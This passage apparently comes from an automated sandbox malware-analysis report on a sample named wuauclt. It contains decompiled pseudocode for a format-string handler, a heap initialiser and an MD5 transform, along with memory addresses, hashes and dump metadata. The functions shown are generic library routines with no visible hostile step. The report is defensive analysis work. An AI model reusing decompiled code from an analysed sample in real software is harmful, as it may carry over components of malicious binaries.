                                                0x00266f69
                                                0x00266f6f
                                                0x00266f76
                                                0x00266f78
                                                0x00266f78
                                                0x00266f7f
                                                0x00266f81
                                                0x00266f81
                                                0x00266f88
                                                0x00266f8a
                                                0x00266f8a
                                                0x00266f91
                                                0x00266f93
                                                0x00266f93
                                                0x00266f9a
                                                0x00266f9c
                                                0x00266f9c
                                                0x00266fa9
                                                0x00266fac
                                                0x00266fe3
                                                0x00266fae
                                                0x00266fae
                                                0x00266fb1
                                                0x00266fdc
                                                0x00266fd1
                                                0x00266fd1
                                                0x00266fe5
                                                0x00266fed
                                                0x00266ff0
                                                0x0026700f
                                                0x00267014
                                                0x00267014
                                                0x00267016
                                                0x0026701b
                                                0x00267027
                                                0x0026701d
                                                0x00267020
                                                0x00267020
                                                0x0026702c
                                                0x0026702c
                                                0x00266ff2
                                                0x00266ff5
                                                0x00267004
                                                0x00000000
                                                0x00267004
                                                0x00266ff7
                                                0x00266ffa
                                                0x00266ffc
                                                0x00266ffc
                                                0x00000000
                                                0x00266ffa
                                                0x00266fb3
                                                0x00266fb6
                                                0x00266fcc
                                                0x00000000
                                                0x00266fcc
                                                0x00266fbb
                                                0x00266fbd
                                                0x00266fbd
                                                0x00266fbb
                                                0x00000000
                                                0x00266fac
                                                0x00266eae
                                                0x00266ebc
                                                0x00266ec4
                                                0x00000000
                                                0x00266ec4
                                                0x00266eb2
                                                0x00266eb7
                                                0x00266eb7
                                                0x00000000
                                                0x00266eb2
                                                0x00266e6f
                                                0x00266e7d
                                                0x00266e85
                                                0x00000000
                                                0x00266e85
                                                0x00266e73
                                                0x00266e78
                                                0x00266e78
                                                0x00266e73

                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00266D37,?,?,00000008,?,?,002669D7,00000000), ref: 00266F69
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 82e542a26e7a01a6a09ef54bffc42b25a6d8f1d951c63aa2fe6da9fe82aa8dd3
                                                • Instruction ID: 8debd7cff4e8eb63474ae9cc7a547080f1642c6a1fe34fdad9ced91afb7f0b5b
                                                • Opcode Fuzzy Hash: 82e542a26e7a01a6a09ef54bffc42b25a6d8f1d951c63aa2fe6da9fe82aa8dd3
                                                • Instruction Fuzzy Hash: EFB17E35220609DFD715CF28C48AB657BE0FF45364F25865CE89ACF2A1C336E9A1CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025AF52 Relevance: 1.5, Strings: 1, Instructions: 214COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E0025AF52(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E0025B64A(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0025A8D8(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E0025B7C1(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0025A8D8(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E0025B71A(_t95, _t119, _t116, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0025A8D8(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E0025B455(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E0025B632(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E0025B26B(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0025B59F(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E0025B613(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E0025B208(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0025B3C5(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                                                0x0025af57
                                                0x0025af5a
                                                0x0025af5e
                                                0x0025af61
                                                0x0025af65
                                                0x0025af68
                                                0x0025afd6
                                                0x0025afd9
                                                0x0025b028
                                                0x0025b028
                                                0x0025b02b
                                                0x0025af98
                                                0x0025af9a
                                                0x0025af9f
                                                0x0025afa1
                                                0x0025b046
                                                0x0025b04a
                                                0x0025b053
                                                0x0025b058
                                                0x0025b059
                                                0x0025b05d
                                                0x0025b05f
                                                0x0025b064
                                                0x0025b067
                                                0x0025b069
                                                0x0025b092
                                                0x0025b092
                                                0x0025b095
                                                0x0025b098
                                                0x0025b09f
                                                0x0025b0a1
                                                0x0025b0a4
                                                0x0025b0a6
                                                0x0025b0aa
                                                0x0025b0aa
                                                0x0025b0ad
                                                0x0025b0b8
                                                0x0025b0b8
                                                0x0025b0ba
                                                0x0025b0ba
                                                0x0025b0bc
                                                0x0025b0c2
                                                0x0025b0c2
                                                0x0025b0c7
                                                0x0025b0ca
                                                0x0025b0d5
                                                0x0025b0d5
                                                0x0025b0d7
                                                0x0025b0d7
                                                0x0025b0e2
                                                0x0025b0e6
                                                0x0025b0e6
                                                0x0025b0e9
                                                0x0025b0ef
                                                0x0025b0f1
                                                0x0025b0f4
                                                0x0025b104
                                                0x0025b109
                                                0x0025b109
                                                0x0025b11e
                                                0x0025b123
                                                0x0025b126
                                                0x0025b12b
                                                0x0025b12e
                                                0x0025b130
                                                0x0025b132
                                                0x0025b135
                                                0x0025b138
                                                0x0025b145
                                                0x0025b14a
                                                0x0025b14a
                                                0x0025b138
                                                0x0025b151
                                                0x0025b156
                                                0x0025b159
                                                0x0025b15e
                                                0x0025b161
                                                0x0025b163
                                                0x0025b170
                                                0x0025b175
                                                0x0025b163
                                                0x0025b178
                                                0x0025b17b
                                                0x0025b180
                                                0x0025b180
                                                0x0025b0cc
                                                0x0025b0cf
                                                0x00000000
                                                0x00000000
                                                0x0025b0d1
                                                0x00000000
                                                0x0025b0d1
                                                0x0025b0be
                                                0x0025b0c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025b0c0
                                                0x0025b0af
                                                0x0025b0b2
                                                0x00000000
                                                0x00000000
                                                0x0025b0b4
                                                0x00000000
                                                0x0025b0b4
                                                0x0025b0a8
                                                0x0025b0a8
                                                0x0025b0a8
                                                0x00000000
                                                0x0025b0a8
                                                0x0025b09a
                                                0x0025b09d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025b09d
                                                0x0025b06d
                                                0x0025b070
                                                0x0025b072
                                                0x0025b07a
                                                0x0025b07c
                                                0x0025b086
                                                0x0025b088
                                                0x0025b08a
                                                0x00000000
                                                0x00000000
                                                0x0025b08c
                                                0x0025b090
                                                0x0025b090
                                                0x00000000
                                                0x0025b090
                                                0x0025b07e
                                                0x00000000
                                                0x0025b07e
                                                0x0025b074
                                                0x00000000
                                                0x0025b074
                                                0x0025b04c
                                                0x00000000
                                                0x0025b04c
                                                0x0025afa7
                                                0x0025afa7
                                                0x00000000
                                                0x0025afa7
                                                0x0025b032
                                                0x0025b032
                                                0x0025b035
                                                0x0025b007
                                                0x0025b007
                                                0x0025b008
                                                0x0025b00a
                                                0x0025b00c
                                                0x00000000
                                                0x0025b00c
                                                0x0025b037
                                                0x0025b03a
                                                0x00000000
                                                0x00000000
                                                0x0025b040
                                                0x0025afaf
                                                0x0025afaf
                                                0x00000000
                                                0x0025afaf
                                                0x0025afdb
                                                0x0025b01e
                                                0x00000000
                                                0x0025b01e
                                                0x0025afdd
                                                0x0025afe0
                                                0x0025b013
                                                0x0025b015
                                                0x00000000
                                                0x0025b015
                                                0x0025afe2
                                                0x0025afe5
                                                0x0025b003
                                                0x0025b003
                                                0x0025b003
                                                0x0025b003
                                                0x00000000
                                                0x0025b003
                                                0x0025afe7
                                                0x0025afea
                                                0x0025affc
                                                0x00000000
                                                0x0025affc
                                                0x0025afec
                                                0x0025afef
                                                0x00000000
                                                0x00000000
                                                0x0025aff3
                                                0x00000000
                                                0x0025aff3
                                                0x0025af6a
                                                0x00000000
                                                0x00000000
                                                0x0025af70
                                                0x0025af73
                                                0x0025afb3
                                                0x0025afb3
                                                0x0025afb6
                                                0x0025afcf
                                                0x00000000
                                                0x0025afcf
                                                0x0025afb8
                                                0x0025afb8
                                                0x0025afbb
                                                0x00000000
                                                0x00000000
                                                0x0025afbe
                                                0x0025afc1
                                                0x00000000
                                                0x00000000
                                                0x0025afc3
                                                0x0025afc6
                                                0x00000000
                                                0x0025afc6
                                                0x0025af75
                                                0x0025afae
                                                0x00000000
                                                0x0025afae
                                                0x0025af7a
                                                0x00000000
                                                0x00000000
                                                0x0025af83
                                                0x00000000
                                                0x00000000
                                                0x0025af88
                                                0x00000000
                                                0x00000000
                                                0x0025af8d
                                                0x00000000
                                                0x00000000
                                                0x0025af96
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: f8a09bf90652abba03e4c4632af07912c1671ed9223366bd2e24022b032d3914
                                                • Instruction ID: 954476099f513b9c5b2a64adde7f348d93d6dac353dcb397586b3039f0627ddf
                                                • Opcode Fuzzy Hash: f8a09bf90652abba03e4c4632af07912c1671ed9223366bd2e24022b032d3914
                                                • Instruction Fuzzy Hash: 275199A0630A466ADB3B4D288467BBF23859B41303F040A09EC52C7AC2D772DD3D835F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0026127C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0026127C() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x273f10 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                0x0026127c
                                                0x00261284
                                                0x0026128c

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: c3dbe67e562f5eebf6d9fb5824bd4f16f704dcc76a2f74d5967e2d2692c727d2
                                                • Instruction ID: b109d75ec1e38021ce865a65b35df87bb322bc641e5da5a7d86a8c76f06c9acd
                                                • Opcode Fuzzy Hash: c3dbe67e562f5eebf6d9fb5824bd4f16f704dcc76a2f74d5967e2d2692c727d2
                                                • Instruction Fuzzy Hash: CAA01130A002028B83008F30BA0C20C3AACAB002C03088028E80AC0020EBB082C0AA82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00253D70 Relevance: .7, Instructions: 710COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 54%
                                                			E00253D70(intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t154;
				void* _t394;
				intOrPtr _t396;
				signed int _t401;
				signed int _t403;
				signed int _t405;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t426;
				intOrPtr* _t427;
				signed int _t517;
				signed int _t600;
				signed int _t605;
				signed int _t610;
				signed int _t614;
				signed int _t616;
				signed int _t618;
				signed int _t620;
				intOrPtr _t627;
				signed int _t630;
				signed int _t632;
				signed int _t634;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t645;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t656;
				signed int _t661;
				signed int _t663;
				signed int _t665;
				signed int _t667;
				signed int _t669;
				signed int _t672;
				signed int _t674;
				intOrPtr _t675;
				intOrPtr _t676;
				signed int _t681;
				signed int _t683;
				signed int _t685;
				signed int _t688;
				signed int _t692;
				signed int _t694;
				signed int _t696;
				signed int _t698;
				signed int _t701;
				signed int _t703;
				signed int _t705;
				signed int _t707;
				signed int _t709;
				signed int _t711;
				signed int _t713;
				signed int _t716;
				intOrPtr _t720;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t730;
				signed int _t735;
				signed int _t737;
				signed int _t739;
				signed int _t743;
				signed int _t745;
				signed int _t747;
				signed int _t749;
				signed int _t751;
				signed int _t753;
				signed int _t755;
				signed int _t757;
				signed int _t759;

				_v12 = __ecx;
				_t674 =  *(__ecx + 0xc);
				_t627 =  *((intOrPtr*)(__edx));
				_v76 = _t674;
				_t675 = _v12;
				_v60 = _t627;
				_v8 = __edx;
				_t720 =  *((intOrPtr*)(__edx + 4));
				asm("rol edx, 0x7");
				_v68 = _t720;
				_t154 =  *(_t675 + 4);
				_t630 =  *__ecx - 0x28955b88 + ( !( *(__ecx + 4)) & _t674 |  *(__ecx + 8) &  *(_t675 + 4)) + _t627 + _t154;
				_t676 =  *((intOrPtr*)(__edx + 8));
				_t396 =  *((intOrPtr*)(__edx + 0xc));
				_v72 = _t676;
				asm("rol esi, 0xc");
				_t724 = _v76 + 0xe8c7b756 + ( !_t630 &  *(_t675 + 8) | _t154 & _t630) + _t720 + _t630;
				_v64 = _t396;
				asm("rol edi, 0x11");
				_t681 =  *((intOrPtr*)(_v12 + 8)) + 0x242070db + ( !_t724 &  *(_v12 + 4) | _t724 & _t630) + _t676 + _t724;
				_v44 =  *((intOrPtr*)(_v8 + 0x10));
				asm("rol ebx, 0x16");
				_t401 =  *(_v12 + 4) + 0xc1bdceee + ( !_t681 & _t630 | _t724 & _t681) + _t396 + _t681;
				asm("rol edx, 0x7");
				_t632 = _t630 + ( !_t401 & _t724 | _t681 & _t401) + 0xf57c0faf + _v44 + _t401;
				_v24 =  *((intOrPtr*)(_v8 + 0x14));
				_v36 =  *((intOrPtr*)(_v8 + 0x18));
				asm("rol esi, 0xc");
				_t726 = _t724 + ( !_t632 & _t681 | _t401 & _t632) + 0x4787c62a + _v24 + _t632;
				_v16 =  *((intOrPtr*)(_v8 + 0x1c));
				asm("rol edi, 0x11");
				_t683 = _t681 + ( !_t726 & _t401 | _t726 & _t632) + 0xa8304613 + _v36 + _t726;
				_v32 =  *((intOrPtr*)(_v8 + 0x20));
				asm("rol ebx, 0x16");
				_t403 = _t401 + ( !_t683 & _t632 | _t726 & _t683) + 0xfd469501 + _v16 + _t683;
				asm("rol edx, 0x7");
				_t634 = _t632 + ( !_t403 & _t726 | _t683 & _t403) + 0x698098d8 + _v32 + _t403;
				_v52 =  *((intOrPtr*)(_v8 + 0x24));
				asm("rol esi, 0xc");
				_t728 = _t726 + ( !_t634 & _t683 | _t403 & _t634) + 0x8b44f7af + _v52 + _t634;
				_v28 =  *((intOrPtr*)(_v8 + 0x28));
				_v48 =  *((intOrPtr*)(_v8 + 0x2c));
				asm("rol edi, 0x11");
				_t685 = _t683 + ( !_t728 & _t403 | _t728 & _t634) + 0xffff5bb1 + _v28 + _t728;
				_v80 = _t685;
				_v56 =  *((intOrPtr*)(_v8 + 0x30));
				asm("rol ebx, 0x16");
				_t405 = _t403 + ( !_t685 & _t634 | _t728 & _t685) + 0x895cd7be + _v48 + _t685;
				_v84 = _t405;
				_v40 =  *((intOrPtr*)(_v8 + 0x34));
				asm("rol edx, 0x7");
				_t636 = _t634 + ( !_t405 & _t728 | _t685 & _t405) + 0x6b901122 + _v56 + _t405;
				_v76 = _t636;
				asm("rol edi, 0xc");
				_t688 = _t728 - 0x2678e6d + ( !_t636 & _t685 | _t405 & _t636) + _v40 + _t636;
				_v20 =  *((intOrPtr*)(_v8 + 0x38));
				_t730 =  !_t688;
				_v88 = _t688;
				asm("rol ebx, 0x11");
				_t409 = _v80 + 0xa679438e + (_t730 & _t405 | _t688 & _t636) + _v20 + _t688;
				_t638 =  !_t409;
				_v8 =  *((intOrPtr*)(_v8 + 0x3c));
				_t517 = _v88;
				asm("rol edi, 0x16");
				_t692 = _v84 + 0x49b40821 + (_t638 & _v76 | _t688 & _t409) + _v8 + _t409;
				asm("rol esi, 0x5");
				_t735 = (_t730 & _t409 | _t517 & _t692) + _v68 + _v76 + 0xf61e2562 + _t692;
				asm("rol edx, 0x9");
				_t643 = (_t638 & _t692 | _t409 & _t735) + _v36 + _t517 + 0xc040b340 + _t735;
				asm("rol ebx, 0xe");
				_t411 = _t409 + ( !_t692 & _t735 | _t643 & _t692) + 0x265e5a51 + _v48 + _t643;
				asm("rol edi, 0x14");
				_t694 = _t692 + ( !_t735 & _t643 | _t411 & _t735) + 0xe9b6c7aa + _v60 + _t411;
				asm("rol esi, 0x5");
				_t737 = _t735 + ( !_t643 & _t411 | _t643 & _t694) + 0xd62f105d + _v24 + _t694;
				asm("rol edx, 0x9");
				_t645 = _t643 + ( !_t411 & _t694 | _t411 & _t737) + 0x2441453 + _v28 + _t737;
				asm("rol ebx, 0xe");
				_t413 = _t411 + ( !_t694 & _t737 | _t645 & _t694) + 0xd8a1e681 + _v8 + _t645;
				asm("rol edi, 0x14");
				_t696 = _t694 + ( !_t737 & _t645 | _t413 & _t737) + 0xe7d3fbc8 + _v44 + _t413;
				asm("rol esi, 0x5");
				_t739 = _t737 + ( !_t645 & _t413 | _t645 & _t696) + 0x21e1cde6 + _v52 + _t696;
				asm("rol edx, 0x9");
				_t647 = _t645 + ( !_t413 & _t696 | _t413 & _t739) + 0xc33707d6 + _v20 + _t739;
				_v88 = _t647;
				asm("rol ebx, 0xe");
				_t415 = _t413 + ( !_t696 & _t739 | _t647 & _t696) + 0xf4d50d87 + _v64 + _t647;
				asm("rol edi, 0x14");
				_t698 = _t696 + ( !_t739 & _t647 | _t415 & _t739) + 0x455a14ed + _v32 + _t415;
				_v84 = _t698;
				asm("rol edx, 0x5");
				_t650 = _t739 - 0x561c16fb + ( !_t647 & _t415 | _t647 & _t698) + _v40 + _t698;
				asm("rol esi, 0x9");
				_t743 = _v88 + 0xfcefa3f8 + ( !_t415 & _t698 | _t415 & _t650) + _v72 + _t650;
				asm("rol edi, 0xe");
				_t701 = _t415 + 0x676f02d9 + ( !_t698 & _t650 | _t743 & _t698) + _v16 + _t743;
				asm("rol ebx, 0x14");
				_t419 = _v84 + 0x8d2a4c8a + ( !_t650 & _t743 | _t701 & _t650) + _v56 + _t701;
				asm("rol edx, 0x4");
				_t652 = _t650 + (_t743 ^ _t701 ^ _t419) + 0xfffa3942 + _v24 + _t419;
				asm("rol esi, 0xb");
				_t745 = _t743 + (_t701 ^ _t419 ^ _t652) + 0x8771f681 + _v32 + _t652;
				asm("rol edi, 0x10");
				_t703 = _t701 + (_t745 ^ _t419 ^ _t652) + 0x6d9d6122 + _v48 + _t745;
				_t600 = _t745 ^ _t703;
				asm("rol ebx, 0x17");
				_t421 = _t419 + (_t600 ^ _t652) + 0xfde5380c + _v20 + _t703;
				asm("rol edx, 0x4");
				_t654 = _t652 + (_t600 ^ _t421) + 0xa4beea44 + _v68 + _t421;
				asm("rol esi, 0xb");
				_t747 = _t745 + (_t703 ^ _t421 ^ _t654) + 0x4bdecfa9 + _v44 + _t654;
				asm("rol edi, 0x10");
				_t705 = _t703 + (_t747 ^ _t421 ^ _t654) + 0xf6bb4b60 + _v16 + _t747;
				_t605 = _t747 ^ _t705;
				asm("rol ebx, 0x17");
				_t423 = _t421 + (_t605 ^ _t654) + 0xbebfbc70 + _v28 + _t705;
				asm("rol edx, 0x4");
				_t656 = _t654 + (_t605 ^ _t423) + 0x289b7ec6 + _v40 + _t423;
				_v88 = _t656;
				asm("rol esi, 0xb");
				_t749 = _t747 + (_t705 ^ _t423 ^ _t656) + 0xeaa127fa + _v60 + _t656;
				asm("rol edi, 0x10");
				_t707 = _t705 + (_t749 ^ _t423 ^ _t656) + 0xd4ef3085 + _v64 + _t749;
				_t610 = _t749 ^ _t707;
				asm("rol edx, 0x17");
				_t661 = (_t656 ^ _t610) + 0x4881d05 + _v36 + _t423 + _t707;
				asm("rol ecx, 0x4");
				_t614 = (_t610 ^ _t661) + _v52 + _v88 + 0xd9d4d039 + _t661;
				asm("rol esi, 0xb");
				_t751 = _t749 + (_t707 ^ _t661 ^ _t614) + 0xe6db99e5 + _v56 + _t614;
				asm("rol edi, 0x10");
				_t709 = _t707 + (_t751 ^ _t661 ^ _t614) + 0x1fa27cf8 + _v8 + _t751;
				asm("rol edx, 0x17");
				_t663 = _t661 + (_t751 ^ _t709 ^ _t614) + 0xc4ac5665 + _v72 + _t709;
				asm("rol ecx, 0x6");
				_t616 = _t614 + (( !_t751 | _t663) ^ _t709) + 0xf4292244 + _v60 + _t663;
				asm("rol esi, 0xa");
				_t753 = _t751 + (( !_t709 | _t616) ^ _t663) + 0x432aff97 + _v16 + _t616;
				asm("rol edi, 0xf");
				_t711 = _t709 + (( !_t663 | _t753) ^ _t616) + 0xab9423a7 + _v20 + _t753;
				asm("rol edx, 0x15");
				_t665 = _t663 + (( !_t616 | _t711) ^ _t753) + 0xfc93a039 + _v24 + _t711;
				asm("rol ecx, 0x6");
				_t618 = _t616 + (( !_t753 | _t665) ^ _t711) + 0x655b59c3 + _v56 + _t665;
				asm("rol esi, 0xa");
				_t755 = _t753 + (( !_t711 | _t618) ^ _t665) + 0x8f0ccc92 + _v64 + _t618;
				asm("rol edi, 0xf");
				_t713 = _t711 + (( !_t665 | _t755) ^ _t618) + 0xffeff47d + _v28 + _t755;
				asm("rol edx, 0x15");
				_t667 = _t665 + (( !_t618 | _t713) ^ _t755) + 0x85845dd1 + _v68 + _t713;
				asm("rol ecx, 0x6");
				_t620 = _t618 + (( !_t755 | _t667) ^ _t713) + 0x6fa87e4f + _v32 + _t667;
				asm("rol esi, 0xa");
				_t757 = _t755 + (( !_t713 | _t620) ^ _t667) + 0xfe2ce6e0 + _v8 + _t620;
				asm("rol ebx, 0xf");
				_t426 = _t713 - 0x5cfebcec + (( !_t667 | _t757) ^ _t620) + _v36 + _t757;
				asm("rol edx, 0x15");
				_t669 = _t667 + (( !_t620 | _t426) ^ _t757) + 0x4e0811a1 + _v40 + _t426;
				_v88 = _t669;
				asm("rol edi, 0x6");
				_t716 = _t620 - 0x8ac817e + (( !_t757 | _t669) ^ _t426) + _v44 + _t669;
				asm("rol esi, 0xa");
				_t759 = _t757 + (( !_t426 | _t716) ^ _t669) + 0xbd3af235 + _v48 + _t716;
				_t427 = _v12;
				 *_t427 =  *_t427 + _t716;
				asm("rol edx, 0xf");
				_t672 = _t426 + 0x2ad7d2bb + (( !_t669 | _t759) ^ _t716) + _v72 + _t759;
				 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t427 + 8)) + _t672;
